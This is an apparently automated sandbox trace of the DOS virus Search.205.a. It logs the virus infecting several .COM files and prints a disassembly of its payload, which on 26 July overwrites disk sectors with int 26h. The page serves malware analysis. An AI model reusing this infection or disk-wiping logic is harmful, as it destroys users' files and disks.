Sample viewer

vx.netlux.org/Virus.DOS.Search.205.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:44.289526636Z 26 PC: 12ab4 | Set disk transfer address
2018-12-17T22:43:44.290771669Z 78 PC: 12ac0 | Find first file
2018-12-17T22:43:44.297471766Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:44.30455577Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.311971667Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.314145594Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.31718378Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.318841196Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.346313373Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.349201902Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.354844737Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.357336223Z 61 PC: 12ad0 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:43:44.361914045Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.366074048Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.367373387Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.369465774Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.371377736Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.375225027Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.378476876Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.387568253Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.391495683Z 61 PC: 12ad0 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:43:44.399957291Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.407354756Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.409206845Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.416859205Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.419692299Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.423320251Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.427933839Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.436783911Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.439854197Z 61 PC: 12ad0 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:43:44.448188727Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.460262199Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.461531595Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.464670017Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.466425043Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.469463618Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.47194117Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.477929936Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.480873934Z 61 PC: 12ad0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:43:44.48832499Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.495770913Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.497325912Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.500277676Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.502095824Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.504897386Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.507860836Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.516951136Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.520015029Z 61 PC: 12ad0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:43:44.527402511Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.540343144Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.542003995Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.544879723Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.54721293Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.556367346Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.559905409Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.569749847Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.572646578Z 61 PC: 12ad0 | Open file (Filename = 'PAH.COM')
2018-12-17T22:43:44.579827092Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.588863173Z 66 PC: 12af0 | Move file pointer
2018-12-17T22:43:44.590590972Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.593522299Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:43:44.595158668Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-17T22:43:44.598465387Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:43:44.601548006Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.610805895Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.614416426Z 61 PC: 12ad0 | Open file (Filename = 'TEST.COM')
2018-12-17T22:43:44.621588503Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-17T22:43:44.624308801Z 62 PC: 12b28 | Close file
2018-12-17T22:43:44.627247708Z 79 PC: 12ac0 | Find next file
2018-12-17T22:43:44.630069172Z 26 PC: 12b33 | Set disk transfer address
2018-12-17T22:43:44.631434171Z 42 PC: 12b4a | Get date 0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-17T22:43:44.634329305Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:02.935887668Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:02.937927801Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:02.945162552Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:02.952705814Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:02.973011036Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:02.974751981Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:02.977952808Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:02.980132976Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:02.997249103Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.000710426Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.010274632Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.013382524Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.021331511Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.028767163Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.030942332Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.033953402Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.03553331Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.046303543Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.049594467Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.058950847Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.062885374Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.07028408Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.077386932Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.079760703Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.082681232Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.084237865Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.08737693Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.090749223Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.105261368Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.108687096Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.117207027Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.124217644Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.125799789Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.129961177Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.13147932Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.134388938Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.142176943Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.151049236Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.153953508Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.162860083Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.169999683Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.17143056Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.174475888Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.203768276Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.207411861Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.210807129Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.220831584Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.224025292Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.23194882Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.241353259Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.243443292Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.246934552Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.249985795Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.259785899Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.262997688Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.273055337Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.27695368Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.284646572Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.292270261Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.29521992Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.298566682Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.300450274Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.304845363Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.309055612Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.317881898Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.322575893Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.33028143Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.333068184Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.33586127Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.338663691Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:03.339924952Z 42 PC: 12b4a | Get date 0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:03.342377664Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:03.26498512Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:03.266112598Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:03.273459607Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:03.278183771Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:03.282619812Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:03.284355114Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.287059786Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:03.289182277Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:03.301914122Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.304985949Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.314152045Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.317312619Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.324375495Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.332104893Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.334865174Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.3369047Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.338012884Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.340143148Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.343299097Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.351700012Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.354369219Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.363087834Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.37123919Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.372979732Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.377124164Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.378835827Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.382421639Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.386147295Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.394672877Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.397587636Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.405603339Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.412958367Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.414513306Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.418232697Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.420045327Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.42299116Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.426884289Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.43563744Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.439413146Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.44784586Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.45532151Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.4572238Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.460523491Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.46344157Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.467270931Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.470603743Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.480362121Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.48349335Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.491323125Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.499858506Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.502391136Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.506872864Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.509269536Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.519484293Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.523736321Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.53290212Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.536784587Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.544265504Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.551532242Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.554198083Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.557223081Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.558824224Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.563230847Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.572960721Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.589403358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.592736609Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.600791901Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.604018177Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.606449817Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.610616317Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:03.612212406Z 42 PC: 12b4a | Get date 0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:03.61488278Z 25 PC: 12b54 | Get default drive
2018-12-25T12:03:03.623098138Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:03.66021586Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:03.661484198Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:03.671086456Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:03.678930523Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:03.68655993Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:03.689656037Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.692666548Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:03.69431394Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:03.710494406Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:03.71397442Z 62 PC: 12b28 | Close file
2018-12-25T12:03:03.723348383Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.726484202Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.73445963Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.742005845Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.743910778Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.74772197Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.749476923Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.752453663Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.755946772Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.764716814Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.767722657Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.775544253Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.783133005Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.784602153Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.788935676Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.790996915Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.793954334Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.797514935Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.806363575Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.809137764Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.816961259Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.824498208Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.826062099Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.829120898Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.830856425Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.834104961Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.836904879Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.845717118Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.848423511Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.855937366Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.86334606Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.865282535Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.868522519Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.871061429Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.874422465Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.877313134Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.887467852Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.890980129Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.89878829Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.906489777Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.908230665Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.911221377Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.913066954Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.922037827Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.925744572Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.934649026Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.947797619Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:03.955320617Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:03.96272218Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:03.965280992Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:03.9683242Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:03.96999614Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:03.976133039Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:03.97949737Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:03.988771427Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:03.992969525Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.001263111Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.005899762Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.009166066Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.012790833Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:04.014582162Z 42 PC: 12b4a | Get date 0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:04.017550665Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7979,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:04.000084716Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T12:03:04.001739945Z 78 PC: 12ac0 | Find first file
2018-12-25T12:03:04.007760546Z 61 PC: 12ad0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:04.014272057Z 63 PC: 12ae1 | Read file or device (Read 13 bytes on handle 5)
2018-12-25T12:03:04.022537381Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:03:04.024300569Z 64 PC: 12aff | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:04.026817546Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:03:04.028547809Z 64 PC: 12b18 | Write file or device (Write 192 bytes on handle 5)
2018-12-25T12:03:04.045568264Z 64 PC: 12b24 | Write file or device (Write 13 bytes on handle 5)
2018-12-25T12:03:04.047391987Z 62 PC: 12b28 | Close file
2018-12-25T12:03:04.0526547Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.057039946Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.064933961Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.071548628Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.074189369Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.077034706Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.078484535Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.082041915Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.084856758Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.092973833Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.096312962Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.103355673Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.109619702Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.111240637Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.11365305Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.114923047Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.117681672Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.120273337Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.127717811Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.13083008Z 61 PC: 12ad0 | Open file (See above)
